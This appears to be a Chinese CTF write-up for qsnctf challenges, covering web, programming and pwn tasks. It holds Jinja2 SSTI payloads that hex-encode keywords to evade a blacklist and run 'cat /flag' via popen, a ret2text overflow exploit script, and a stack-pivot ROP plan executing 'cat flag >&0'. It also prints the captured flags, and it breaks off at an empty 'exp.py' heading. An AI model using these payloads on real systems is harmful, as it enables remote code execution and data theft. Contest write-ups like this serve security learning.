\u5c1d\u8bd5\u8f93\u5165 {{config}}\u3001{{flag}} \u6216 {{''.__class__}}\uff0c\u9875\u9762\u63d0\u793a\u201c\u7981\u5fcc\u4e4b\u8bed\u201d\u6216\u62a5\u9519\u3002\n\u9898\u76ee\u8bbe\u7f6e\u4e86\u9ed1\u540d\u5355\uff0c\u8fc7\u6ee4\u4e86 os\u3001flag\u3001system\u3001popen\u3001__globals__ \u7b49\u654f\u611f\u5173\u952e\u8bcd\u3002<\/code><\/pre>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
\u7ed5\u8fc7\u601d\u8def\uff08Hex\u7f16\u7801\uff09<\/p>\n\n\n\n
\u65e2\u7136\u8fc7\u6ee4\u7684\u662f\u660e\u6587\u5173\u952e\u8bcd\uff0c\u6211\u4eec\u53ef\u4ee5\u5229\u7528 Python \u652f\u6301 \u5341\u516d\u8fdb\u5236\u5b57\u7b26\u4e32\uff08Hex\uff09 \u7684\u7279\u6027\u6765\u7ed5\u8fc7\u3002\n\u5982\uff1aos \u53ef\u4ee5\u5199\u6210 x6fx73\uff0cWAF \u8ba4\u4e0d\u51fa\u8fd9\u662f os\uff0c\u4f46 Python \u540e\u7aef\u6267\u884c\u65f6\u4f1a\u81ea\u52a8\u8fd8\u539f\u3002\n\u540c\u65f6\uff0c\u4e3a\u4e86\u907f\u514d\u4f7f\u7528\u70b9\u53f7 `.` \u53ef\u80fd\u5e26\u6765\u7684\u8fc7\u6ee4\uff0c\u4f7f\u7528\u5b57\u5178\u4e2d\u62ec\u53f7 ['...'] \u7684\u5f62\u5f0f\u8c03\u7528\u5c5e\u6027\u3002<\/code><\/pre>\n\n\n\n
\u6784\u9020\u94fe\u6761<\/strong>\uff1a<\/p>\n\n\n\n
\u627e\u4e00\u4e2a\u5185\u7f6e\u5bf9\u8c61 (lipsum \u6216 url_for) -> \u83b7\u53d6\u5168\u5c40\u53d8\u91cf (__globals__) -> \u5f15\u5165 os \u6a21\u5757 -> \u8c03\u7528 popen \u6267\u884c\u547d\u4ee4 -> read \u8bfb\u53d6\u7ed3\u679c\u3002\n\u5c06\u94fe\u6761\u4e2d\u7684\u6240\u6709\u5b57\u7b26\u4e32\u8f6c\u6362\u4e3a Hex \u7f16\u7801\uff1a\nglobals -> x5fx5fx67x6cx6fx62x61x6cx73x5fx5f\nos -> x6fx73\npopen -> x70x6fx70x65x6e\ncat \/flag -> x63x61x74x20x2fx66x6cx61x67`<\/code><\/pre>\n\n\n\n
Payload<\/p>\n\n\n\n
\u4f7f\u7528lipsum \u6a21\u5757\n\/?question={{lipsum['x5fx5fx67x6cx6fx62x61x6cx73x5fx5f']['x6fx73']['x70x6fx70x65x6e']('x63x61x74x20x2fx66x6cx61x67')['x72x65x61x64']()}}\n\u6216\u8005\u4f7f\u7528url_for\u6a21\u5757\n\/?question={{url_for['x5fx5fx67x6cx6fx62x61x6cx73x5fx5f']['x6fx73']['x70x6fx70x65x6e']('x63x61x74x20x2fx66x6cx61x67')['x72x65x61x64']()}}\n\u6216\u8005\u4f7f\u7528cycler \u6a21\u5757\n\/?question={{cycler['x5fx5fx69x6ex69x74x5fx5f']['x5fx5fx67x6cx6fx62x61x6cx73x5fx5f']['x6fx73']['x70x6fx70x65x6e']('x63x61x74x20x2fx66x6cx61x67')['x72x65x61x64']()}}\n\n\u4e0a\u9762\u7684\u7ecf\u8fc7\u6d4b\u8bd5\u90fd\u53ef\u4ee5<\/code><\/pre>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
qsnctf{5fea3d1543084859aa2963913b900b27}<\/code><\/pre>\n\n\n\n
\u7f16\u7a0b<\/h1>\n\n\n\n
\u4e24\u6570\u4e4b\u548c<\/h2>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
\u8fd9 PPC \u9898\u76ee\uff0c\u8981\u6c42\u4e0e\u670d\u52a1\u5668\u4ea4\u4e92\uff0c\u5728\u77ed\u65f6\u95f4\u5185\u5b8c\u6210 100 \u8f6e\u8ba1\u7b97\u3002\u6838\u5fc3\u662f \u4e24\u6570\u4e4b\u548c \u95ee\u9898\uff1a\u5728\u7ed9\u5b9a\u5217\u8868\u4e2d\u627e\u5230\u4e24\u4e2a\u6570\uff0c\u4f7f\u5176\u548c\u7b49\u4e8e\u76ee\u6807\u503c\uff0c\u5e76\u8fd4\u56de\u5b83\u4eec\u7684\u7d22\u5f15\u548c\u6570\u503c\u3002<\/p>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
\u63d0\u53d6\u6570\u636e\uff1a\u4f7f\u7528\u6b63\u5219\u8868\u8fbe\u5f0f\u4ece\u670d\u52a1\u5668\u8fd4\u56de\u7684\u6587\u672c\u4e2d\u89e3\u6790\u51fa List \u6570\u7ec4\u548c Target \u76ee\u6807\u503c\u3002\n\u89e3\uff1a\u4f7f\u7528\u53cc\u91cd\u5faa\u73af\u904d\u5386\u6570\u7ec4\uff0c\u627e\u5230\u6ee1\u8db3 nums[i] + nums[j] == target \u7684\u4e24\u9879\u3002\n\u53d1\u9001\uff1a\u5c06\u7ed3\u679c\u683c\u5f0f\u5316\u4e3a (idx1,idx2,num1,num2) \u53d1\u9001\u56de\u670d\u52a1\u5668\uff0c\u5faa\u73af 100 \u6b21\u76f4\u81f3\u83b7\u5f97 flag\u3002<\/code><\/pre>\n\n\n\n
py3\u811a\u672c\u5448\u73b0<\/p>\n\n\n\n
from pwn import *\nimport re\n\ncontext.log_level = 'error'\n\ntry:\n    conn = remote('challenge.qsnctf.com', 52538)\n\n    while True:\n        try:\n            data = conn.recvuntil(b'>').decode()\n            print(data, end='')\n\n            list_match = re.search(r'List = [(.*?)]', data)\n            target_match = re.search(r'Target = (d+)', data)\n\n            if not list_match or not target_match:\n                rest = conn.recvall().decode()\n                print(rest)\n                break\n\n            nums = list(map(int, list_match.group(1).split(',')))\n            target = int(target_match.group(1))\n\n            result = None\n            for i in range(len(nums)):\n                for j in range(i + 1, len(nums)):\n                    if nums[i] + nums[j] == target:\n                        result = (i, j, nums[i], nums[j])\n                        break\n                if result:\n                    break\n\n            if result:\n                payload = str(result).replace(\" \", \"\")\n                conn.sendline(payload.encode())\n            else:\n                break\n\n        except EOFError:\n            print(conn.recvall().decode())\n            break\n        except Exception:\n            break\n\nexcept Exception as e:\n    print(e)<\/code><\/pre>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
qsnctf{53083ee3a86644bab418cf4b95b2e7ed}<\/code><\/pre>\n\n\n\n
\u56de\u6587\u6570<\/h2>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
\u7f16\u7a0b\u9898\u3002<\/p>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
\u4ea4\u4e92\u903b\u8f91\uff1a\u8fde\u63a5\u670d\u52a1\u5668\u540e\uff0c\u670d\u52a1\u5668\u4f1a\u4e0d\u65ad\u53d1\u9001\u4e00\u4e2a\u6574\u6570\uff0c\u8981\u6c42\u5224\u65ad\u662f\u5426\u4e3a\u56de\u6587\u6570\uff08\u6b63\u8bfb\u548c\u53cd\u8bfb\u4e00\u6837\uff09\u3002\n\u6838\u5fc3\uff1a\u5728\u4e8e\u731c\u6d4b\u670d\u52a1\u5668\u8981\u6c42\u7684\u8fd4\u56de\u683c\u5f0f\u3002\u5e38\u89c1\u7684\u6709 yes\/no\u30011\/0 \u6216 True\/False\uff0c\u672c\u9898\u8981\u6c42\u8fd4\u56de True \u6216 False (\u9996\u5b57\u6bcd\u5927\u5199)\u3002\n\u89e3\uff1a\u7f16\u5199\u811a\u672c\uff0c\u6b63\u5219\u63d0\u53d6\u6570\u5b57\uff0c\u5229\u7528\u5b57\u7b26\u4e32\u5207\u7247\u7ffb\u8f6c\u5224\u65ad s == s[::-1]\uff0c\u5faa\u73af\u63d0\u4ea4\u5373\u53ef\u3002<\/code><\/pre>\n\n\n\n
py\u811a\u672c\u5448\u73b0<\/p>\n\n\n\n
from pwn import *\nimport re\n\ncontext.log_level = 'error'\n\ntry:\n    conn = remote('challenge.qsnctf.com', 52622)\n\n    while True:\n        try:\n            data = conn.recvuntil(b'Input>').decode()\n\n            nums = re.findall(r'-?d+', data)\n\n            if not nums:\n                print(data)\n                print(conn.recvall().decode())\n                break\n\n            target = nums[-1]\n\n            if target == target[::-1]:\n                conn.sendline(b'True')\n            else:\n                conn.sendline(b'False')\n\n        except EOFError:\n            try:\n                print(conn.recvall().decode())\n            except:\n                pass\n            break\n        except Exception:\n            break\n\nexcept Exception as e:\n    print(e)<\/code><\/pre>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
qsnctf{c9ab78dcf1aa48a18d57cc169256d010}<\/code><\/pre>\n\n\n\n
\u7f57\u9a6c\u6570\u5b57\u8f6c\u6574\u6570<\/h2>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
PPC \u9898\u76ee\u3002\u9898\u76ee\u8981\u6c42\u5728\u591a\u8f6e\u4ea4\u4e92\u4e2d\u63a5\u6536\u670d\u52a1\u5668\u53d1\u9001\u7684\u7f57\u9a6c\u6570\u5b57\u5b57\u7b26\u4e32,\u5982 CDXXXVI\uff0c\u5c06\u5176\u8f6c\u6362\u4e3a\u5341\u8fdb\u5236\u6574\u6570\u5e76\u53d1\u9001\u56de\u670d\u52a1\u5668\uff0c\u5b8c\u6210\u6240\u6709\u8f6e\u6b21\u5373\u53ef\u83b7\u5f97 flag\u3002<\/p>\n\n\n\n
\u601d\u8def,\u63d0\u53d6\uff1a\u901a\u8fc7\u6b63\u5219\u8868\u8fbe\u5f0f ([IVXLCDM]+)<\/code> \u63d0\u53d6\u9898\u76ee\u7ed9\u51fa\u7684\u7f57\u9a6c\u6570\u5b57\u4e32\u3002<\/p>\n\n\n\n
\u7b97\u6cd5<\/p>\n\n\n\n
\u5efa\u7acb\u6620\u5c04\u8868\uff1aI:1, V:5, X:10, L:50, C:100, D:500, M:1000\u3002\n\u904d\u5386\u5b57\u7b26\u4e32\uff1a\u82e5\u5f53\u524d\u4f4d\u6570\u5b57 < \u4e0b\u4e00\u4f4d\u6570\u5b57\uff08\u5982 IV \u4e2d\u7684 I\uff09\uff0c\u5219\u51cf\u53bb\u5f53\u524d\u4f4d\uff1b\u5426\u5219\u52a0\u4e0a\u5f53\u524d\u4f4d\u3002<\/code><\/pre>\n\n\n\n
\u5faa\u73af\u5904\u7406\u6bcf\u4e00\u8f6e\u76f4\u5230\u8fde\u63a5\u65ad\u5f00\u5c31\u5f97\u5230 flag\u4e86\u3002<\/p>\n\n\n\n
py\u811a\u672c\u5448\u73b0<\/p>\n\n\n\n
from pwn import *\nimport re\n\ncontext.log_level = 'error'\n\ndef roman_to_int(s):\n    roman = {'I': 1, 'V': 5, 'X': 10, 'L': 50, 'C': 100, 'D': 500, 'M': 1000}\n    res = 0\n    for i in range(len(s)):\n        if i + 1 < len(s) and roman[s[i]] < roman[s[i+1]]:\n            res -= roman[s[i]]\n        else:\n            res += roman[s[i]]\n    return res\n\ntry:\n    io = remote('challenge.qsnctf.com', 52627)\n\n    while True:\n        try:\n            data = io.recvuntil(b'>').decode()\n\n            match = re.search(r'Round d+:s+([IVXLCDM]+)', data)\n\n            if match:\n                r_num = match.group(1)\n                ans = roman_to_int(r_num)\n                io.sendline(str(ans).encode())\n            else:\n                print(data)\n                print(io.recvall().decode())\n                break\n\n        except EOFError:\n            print(io.recvall().decode())\n            break\n\nexcept Exception as e:\n    print(e)<\/code><\/pre>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
qsnctf{d49ce31229f14a87bef5e248d708fca0}<\/code><\/pre>\n\n\n\n
\u6700\u957f\u516c\u5171\u524d\u7f00<\/h2>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
\u4ea4\u4e92\u903b\u8f91\uff1a\u670d\u52a1\u5668\u53d1\u9001\u4e00\u4e2a\u5305\u542b\u82e5\u5e72\u5b57\u7b26\u4e32\u7684\u5217\u8868\uff0c\u8981\u6c42\u627e\u51fa\u8fd9\u4e9b\u5b57\u7b26\u4e32\u7684\u6700\u957f\u516c\u5171\u524d\u7f00\u3002<\/p>\n\n\n\n
\u6838\u5fc3\uff1a\u5728\u4e8e\u5feb\u901f\u89e3\u6790\u6570\u636e\u548c\u8c03\u7528\u7b97\u6cd5\u3002<\/p>\n\n\n\n
\u89e3<\/p>\n\n\n\n
\u89e3\u6790\uff1a\u5229\u7528\u6b63\u5219\u8868\u8fbe\u5f0f [.*?] \u5339\u914d\u5217\u8868\u5b57\u7b26\u4e32\uff0c\u4f7f\u7528 eval() \u5c06\u5176\u8f6c\u4e3a Python \u5217\u8868\u3002\n\u7b97\u6cd5\uff1aPython \u7684\u6807\u51c6\u5e93 os.path.commonprefix(list) \u672c\u8d28\u4e0a\u5c31\u662f\u6309\u5b57\u7b26\u6bd4\u8f83\u8fd4\u56de\u6700\u957f\u516c\u5171\u524d\u7f00\uff0c\u76f4\u63a5\u4f7f\u7528\uff0c\u4e0d\u7528\u624b\u5199\u5faa\u73af<\/code><\/pre>\n\n\n\n
py3\u811a\u672c\u5448\u73b0<\/p>\n\n\n\n
from pwn import *\nimport re\nimport os\n\ncontext.log_level = 'error'\n\ntry:\n    conn = remote('challenge.qsnctf.com', 52640)\n\n    while True:\n        try:\n            data = conn.recvuntil(b'>').decode()\n\n            match = re.search(r'[.*?]', data, re.DOTALL)\n\n            if match:\n                str_list = eval(match.group(0))\n                ans = os.path.commonprefix(str_list)\n                conn.sendline(ans.encode())\n            else:\n                print(data)\n                print(conn.recvall().decode())\n                break\n\n        except EOFError:\n            print(conn.recvall().decode())\n            break\nexcept Exception as e:\n    print(e)<\/code><\/pre>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
qsnctf{e3ac062cfc2742b990a71f63c9165f6f}<\/code><\/pre>\n\n\n\n
\u6709\u6548\u7684\u62ec\u53f7<\/h2>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
\u6709\u6548\u62ec\u53f7\u7b97\u6cd5\u9898<\/p>\n\n\n\n
\u4ea4\u4e92\u903b\u8f91\uff1a\u670d\u52a1\u5668\u53d1\u9001\u5305\u542b ()[]{} \u7684\u5b57\u7b26\u4e32\uff0c\u8981\u6c42\u5224\u65ad\u62ec\u53f7\u95ed\u5408\u662f\u5426\u5408\u6cd5\u3002<\/p>\n\n\n\n
\u89e3\u9898\u7b97\u6cd5\uff1a<\/p>\n\n\n\n
\u4f7f\u7528\u6808 (Stack)\n\u9047\u5230\u5de6\u62ec\u53f7 ( [ {\uff1a\u538b\u5165\u6808\u4e2d\u3002\n\u9047\u5230\u53f3\u62ec\u53f7 ) ] }\uff1a\u5f39\u51fa\u6808\u9876\u5143\u7d20\uff0c\u68c0\u67e5\u662f\u5426\u5339\u914d\u3002\u5982\u679c\u6808\u4e3a\u7a7a\u6216\u4e0d\u5339\u914d\uff0c\u5219\u4e3a False\u3002\n\u6700\u540e\u82e5\u6808\u4e3a\u7a7a\uff0c\u5219\u4e3a True\u3002<\/code><\/pre>\n\n\n\n
\u8fd4\u56de\u683c\u5f0f\uff1a\u9898\u76ee\u660e\u786e\u8981\u6c42 True\u6216 False\uff08\u533a\u5206\u5927\u5c0f\u5199\uff09\u3002<\/p>\n\n\n\n
\u601d\u8def<\/p>\n\n\n\n
\u4f7f\u7528 re.findall(r'[(){}[]]+', data) \u63d0\u53d6\u9898\u76ee\u4e2d\u7684\u62ec\u53f7\u5b57\u7b26\u4e32\u3002\n\u5b9a\u4e49 is_valid \u51fd\u6570\u5b9e\u73b0\u6808\u7684\u5224\u65ad\u903b\u8f91\u3002\n\u5faa\u73af\u63a5\u6536\u5e76\u53d1\u9001\u7ed3\u679c\uff0c\u76f4\u5230\u62ff\u5230 flag\u3002<\/code><\/pre>\n\n\n\n
py\u811a\u672c\u5448\u73b0<\/p>\n\n\n\n
from pwn import *\nimport re\n\ncontext.log_level = 'error'\n\ndef is_valid(s):\n    stack = []\n    mapping = {\")\": \"(\", \"}\": \"{\", \"]\": \"[\"}\n    for char in s:\n        if char in mapping:\n            top_element = stack.pop() if stack else '#'\n            if mapping[char] != top_element:\n                return False\n\n        else:\n            stack.append(char)\n    return not stack\n\ntry:\n    io = remote('challenge.qsnctf.com', 52663)\n\n    while True:\n        try:\n            data = io.recvuntil(b'Input>').decode()\n\n            matches = re.findall(r'[(){}[]]+', data)\n\n            if not matches:\n                if \"{\" in data or \"flag\" in data.lower():\n                    print(data)\n                    print(io.recvall().decode())\n                    break\n                target = \"\"\n            else:\n                target = matches[-1]\n\n            if is_valid(target):\n                io.sendline(b'True')\n            else:\n                io.sendline(b'False')\n\n        except EOFError:\n            print(io.recvall().decode())\n            break\n\nexcept Exception as e:\n    print(e)<\/code><\/pre>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
qsnctf{a21182a3ab8f4f5faac754585f4caaa5}<\/code><\/pre>\n\n\n\n
\u4e0a\u4e0b\u706b\u8f66<\/h2>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
\u6590\u6ce2\u90a3\u5951\u6570\u5217\u7684\u6570\u5b66\u89c4\u5f8b\u9898<\/p>\n\n\n\n
\u628a\u6bcf\u4e00\u7ad9\u8f66\u4e0a\u7684\u4eba\u6570\u72b6\u6001\u62c6\u5f00\uff0c\u5168\u7528\u5df2\u77e5\u53d8\u91cf a\uff08\u59cb\u53d1\u7ad9\u4eba\u6570\uff09\u548c\u672a\u77e5\u6570 u\uff08\u7b2c\u4e8c\u7ad9\u4e0a\u8f66\u4eba\u6570\uff09\u7684\u7cfb\u6570\u6765\u8868\u793a\u3002<\/p>\n\n\n\n
\u628a\u6bcf\u4e00\u7ad9\u8f66\u4e0a\u7684\u4eba\u6570\u72b6\u6001\u62c6\u5f00\uff0c\u5168\u7528\u5df2\u77e5\u53d8\u91cf a\uff08\u59cb\u53d1\u7ad9\u4eba\u6570\uff09\u548c\u672a\u77e5\u6570 u\uff08\u7b2c\u4e8c\u7ad9\u4e0a\u8f66\u4eba\u6570\uff09\u7684\u7cfb\u6570\u6765\u8868\u793a\u3002\n\n\u63a8\u5bfc\u6bcf\u4e00\u7ad9\u7684\u7cfb\u6570\u903b\u8f91\uff1a\n\u7b2c 1 \u7ad9\uff1a\u603b\u4eba\u6570 1a + 0u\n\u7b2c 2 \u7ad9\uff1a\u603b\u4eba\u6570 1a + 0u\uff0c\u4f46\u8fd9\u7ad9\u4e0a\u8f66\u4e86 u \u4eba\uff0c\u4f1a\u76f4\u63a5\u5f71\u54cd\u540e\u9762\u7684\u9012\u63a8\u3002\n\u4ece\u7b2c 3 \u7ad9\u5f00\u59cb\uff0c\u4e0a\u8f66\u4eba\u6570\u662f\u524d\u4e24\u7ad9\u4e0a\u8f66\u4e4b\u548c\uff0c\u4e0b\u8f66\u662f\u4e0a\u4e00\u7ad9\u4e0a\u8f66\u4eba\u6570\u3002\u79bb\u5f00\u8fd9\u4e00\u7ad9\u7684\u603b\u4eba\u6570\u5c31\u7b49\u4e8e\uff1a\u524d\u4e00\u7ad9\u603b\u4eba\u6570 + \u8fd9\u4e00\u7ad9\u4e0a\u8f66\u4eba\u6570 - \u8fd9\u4e00\u7ad9\u4e0b\u8f66\u4eba\u6570\u3002\n\n\u5f00\u56db\u4e2a\u6570\u7ec4\uff0c\u5206\u522b\u5b58\u6bcf\u4e00\u7ad9 \u4e0a\u8f66\u4eba\u6570\u7684 a \u7cfb\u6570\u3001\u4e0a\u8f66\u4eba\u6570\u7684 u \u7cfb\u6570\u3001\u603b\u4eba\u6570\u7684 a \u7cfb\u6570\u3001\u603b\u4eba\u6570\u7684 u \u7cfb\u6570\uff0c\u5199\u4e2a for \u5faa\u73af\u4e00\u8def\u63a8\u5230\u5e95\u3002\n\n\u7b97\u5230\u7b2c n-1 \u7ad9\u65f6\uff0c\u9898\u76ee\u7ed9\u51fa\u7ec8\u70b9\u7ad9\uff08\u7b2c n \u7ad9\uff09\u4e0b\u8f66\u4eba\u6570\u662f m\uff0c\u8fd9\u5c31\u610f\u5473\u7740\u79bb\u5f00\u7b2c n-1 \u7ad9\u65f6\uff0c\u8f66\u4e0a\u7684\u603b\u4eba\u6570\u5c31\u662f m\u3002\n\u62ff\u7b2c n-1 \u7ad9\u7684\u603b\u4eba\u6570\u516c\u5f0f\uff1aca * a + cu * u = m\uff0c\u76f4\u63a5\u53cd\u63a8\u51fa\u672a\u77e5\u6570 u \u7684\u503c\uff1au = (m - ca * a) \/\/ cu\u3002\n\n\u7b97\u51fa\u771f\u6b63\u7684 u \u4ee5\u540e\uff0c\u53bb\u6570\u7ec4\u91cc\u67e5\u7b2c x \u7ad9\u7684\u7cfb\u6570\uff0c\u4ee3\u5165 a \u548c u \u7b97\u51fa\u5177\u4f53\u4eba\u6570\u53d1\u8fc7\u53bb\u3002pwntools \u5199\u6b63\u5219\u63d0\u53d6\u53c2\u6570\uff0c\u5faa\u73af\u8dd1 100 \u8f6e\u5f97flag\u3002<\/code><\/pre>\n\n\n\n
py3\u811a\u672c\u5448\u73b0<\/p>\n\n\n\n
from pwn import *\nimport re\n\ncontext.log_level = 'warn'\n\ndef solve():\n    try:\n        r = remote('challenge.qsnctf.com', 55627)\n        r.recvuntil(b'Good luck!')\n\n        for _ in range(100):\n            prefix = r.recvuntil(b'Target station (x):').decode()\n            x_text = r.recvline().decode().strip()\n\n            n = int(re.search(r'Stations (n): (d+)', prefix).group(1))\n            a = int(re.search(r'Initial (a): (d+)', prefix).group(1))\n            m = int(re.search(r'Total at n-1 (m): (d+)', prefix).group(1))\n            x = int(x_text)\n\n            if x == n:\n                ans = 0\n            else:\n                up_a = [0] * (n + 1)\n                up_u = [0] * (n + 1)\n                tot_a = [0] * (n + 1)\n                tot_u = [0] * (n + 1)\n\n                up_a[1] = 1; up_u[1] = 0\n                tot_a[1] = 1; tot_u[1] = 0\n\n                if n >= 2:\n                    up_a[2] = 0; up_u[2] = 1\n                    tot_a[2] = 1; tot_u[2] = 0\n\n                for i in range(3, n + 1):\n                    up_a[i] = up_a[i-1] + up_a[i-2]\n                    up_u[i] = up_u[i-1] + up_u[i-2]\n                    tot_a[i] = tot_a[i-1] + up_a[i-2]\n                    tot_u[i] = tot_u[i-1] + up_u[i-2]\n\n                idx_m = n - 1\n                ca = tot_a[idx_m]\n                cu = tot_u[idx_m]\n\n                if cu == 0:\n                    u = 0\n                else:\n                    u = (m - ca * a) \/\/ cu\n\n                ans = tot_a[x] * a + tot_u[x] * u\n\n            r.sendline(str(ans).encode())\n            print(f\"Round {_ + 1}\/100 solved\")\n\n        r.interactive()\n    except Exception as e:\n        print(f\"Error: {e}\")\n\nif __name__ == '__main__':\n    solve()<\/code><\/pre>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
qsnctf{5c48772f393d41a69ac5d46e7df10639}<\/code><\/pre>\n\n\n\n
Pwn<\/h1>\n\n\n\n
\u597d\u591a\u201c\u540e\u201d\u95e8\uff01<\/h2>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
\u6709\u9644\u4ef6<\/p>\n\n\n\n
ExeinfoPe \u67e5\u8be2<\/p>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
32\u4f4d<\/p>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
int __cdecl main(int argc, const char **argv, const char **envp)\n{\n  setbuf(stdout, 0);\n  setbuf(stdin, 0);\n  setbuf(stderr, 0);\n  Team();\n  return 0;\n}<\/code><\/pre>\n\n\n\n
Team<\/p>\n\n\n\n
int Team()\n{\n  char buf; \/\/ [esp+8h] [ebp-90h]\n\n  puts((const char *)&unk_8049930);\n  fflush(stdout);\n  read(0, &buf, 0x100u);\n  puts(&buf);\n  printf(\"Did you not read the question? \");\n  return fflush(stdout);\n}<\/code><\/pre>\n\n\n\n
\u6f0f\u6d1e\u70b9\u5728Team \u51fd\u6570\uff1a<\/p>\n\n\n\n
\u53d8\u91cf\u4f4d\u7f6e\uff1achar buf \u4f4d\u4e8e [ebp-90h]\u3002\n\u6f0f\u6d1e\u70b9\uff1aread(0, &buf, 0x100u) \u8bfb\u53d6\u4e86 0x100 (256) \u5b57\u8282\uff0c\u800c buf \u53ea\u6709 0x90 (144) \u5b57\u8282\uff0c\u5b58\u5728\u6808\u6ea2\u51fa\u3002\n\u540e\u95e8\u51fd\u6570\uff1a\u9898\u76ee\u6709\u591a\u4e2a\u5e72\u6270\u51fd\u6570\uff08fake\u2026\uff09\uff0c\u76ee\u6807\u51fd\u6570\u4e3a f4ck_backdoor_flag\u3002<\/code><\/pre>\n\n\n\n
\u8ba1\u7b97\u504f\u79fb<\/p>\n\n\n\n
\u9700\u8981\u8986\u76d6 buf \u7684\u7a7a\u95f4\u548c\u65e7\u7684 EBP\u624d\u80fd\u4fee\u6539\u8fd4\u56de\u5730\u5740\u3002\nOffset = 0x90(\u5341\u8fdb\u5236 144) + 4 (32\u4f4d EBP \u957f\u5ea6) = 148\u3002<\/code><\/pre>\n\n\n\n
\u601d\u8def<\/p>\n\n\n\n
\u5c31\u662f\u76f4\u63a5 Ret2text \u6280\u672f\u5c31\u53ef\uff0c\u586b\u5145 148 \u4e2a\u5783\u573e\u5b57\u7b26\uff0c\u5c06\u8fd4\u56de\u5730\u5740\u8986\u76d6\u4e3a f4ck_backdoor_flag\u7684\u5730\u5740\uff0c\u5c31\u884c\u4e86<\/code><\/pre>\n\n\n\n
exe.py<\/p>\n\n\n\n
from pwn import *\n\np = remote('challenge.qsnctf.com', 52856)\nelf = ELF('.\/pwn')\n\noffset = 148\nbackdoor = elf.symbols['f4ck_backdoor_flag']\n\npayload = b'a' * offset + p32(backdoor)\n\np.sendline(payload)\np.interactive()<\/code><\/pre>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
qsnctf{8b79a0189e39405896f7b30eceb62faa}<\/code><\/pre>\n\n\n\n
study_system<\/h2>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
\u6709\u9644\u4ef6<\/p>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
IDA \u53cd\u7f16\u8bd1<\/p>\n\n\n\n
\u6f0f\u6d1e\u4f4d\u4e8e gk \u51fd\u6570\u3002<\/p>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
\u5728 IDA \u4e2d\u67e5\u770b\u8be5\u51fd\u6570\uff0c\u53d1\u73b0\u5b58\u5728\u6808\u6ea2\u51fa\u6f0f\u6d1e\uff1a\n\n\u7a0b\u5e8f\u5b9a\u4e49\u4e86\u4e00\u4e2a\u7f13\u51b2\u533a\uff0c\u4f4d\u4e8e ebp-0x5C (92\u5b57\u8282)\u3002\n\u7a0b\u5e8f\u8c03\u7528 read(0, buf, 0x68) \u8bfb\u53d6\u4e86 104 \u5b57\u8282\u3002\n\u6ea2\u51fa\u7a7a\u95f4\uff1a104 - 92 = 12 \u5b57\u8282\u3002\n\u8fd9\u6b63\u597d\u8db3\u591f\u8986\u76d6 Saved EBP (4\u5b57\u8282) \u548c Return Address (4\u5b57\u8282)\uff0c\u53ef\u4ee5\u8fdb\u884c \u6808\u8fc1\u79fb (Stack Pivot)\u3002\n\u6b64\u5916\uff0c\u8be5\u51fd\u6570\u5728 read \u4e4b\u524d\u8c03\u7528\u4e86 close(1)\uff0c\u5173\u95ed\u4e86\u6807\u51c6\u8f93\u51fa\uff0c\u5bfc\u81f4\u666e\u901a\u7684 system(\"\/bin\/sh\") \u65e0\u6cd5\u56de\u663e\u3002<\/code><\/pre>\n\n\n\n
\u5229\u7528\u903b\u8f91<\/p>\n\n\n\n
Payload \uff1a<\/p>\n\n\n\n
\u5229\u7528 12 \u5b57\u8282\u7684\u6ea2\u51fa\uff0c\u5c06 EBP \u4fee\u6539\u4e3a BSS \u6bb5\u7684\u4e00\u4e2a\u5b89\u5168\u5730\u5740\uff08bss_addr + 0x5c\uff09\u3002\n\u5c06\u8fd4\u56de\u5730\u5740\u4fee\u6539\u4e3a 0x804aef5\uff08push 1; call close \u5904\uff09\u3002\n\u8fd9\u4f1a\u4f7f\u7a0b\u5e8f\u6267\u884c\u5b8c\u5f53\u524d\u7684 leave; ret \u540e\uff0c\u6808\u5e27\u8fc1\u79fb\u5230 BSS \u6bb5\uff0c\u5e76\u91cd\u65b0\u6267\u884c read \u51fd\u6570\uff0c\u8fd9\u6b21\u8bfb\u53d6\u7684\u6570\u636e\u5c06\u5199\u5165 BSS \u6bb5\u3002<\/code><\/pre>\n\n\n\n
Payload \uff1a<\/p>\n\n\n\n
\u6b64\u65f6\u8f93\u5165\u7684\u6570\u636e\u4f1a\u88ab\u5199\u5165 BSS \u6bb5\u3002\n\u6784\u9020 ROP \u94fe\u8c03\u7528 system \u51fd\u6570\u3002\n\u5173\u952e\u70b9\uff1a\u7531\u4e8e stdout \u88ab\u5173\u95ed\uff0c\u6211\u4eec\u9700\u8981\u6267\u884c\u7684\u547d\u4ee4\u662f cat flag >&0\uff0c\u5c06\u7ed3\u679c\u91cd\u5b9a\u5411\u56de\u6807\u51c6\u8f93\u5165\uff08socket\uff09\uff0c\u4ece\u800c\u62ff\u5230 flag\u3002<\/code><\/pre>\n\n\n\n
exp.py<\/p>\n\n\n\n
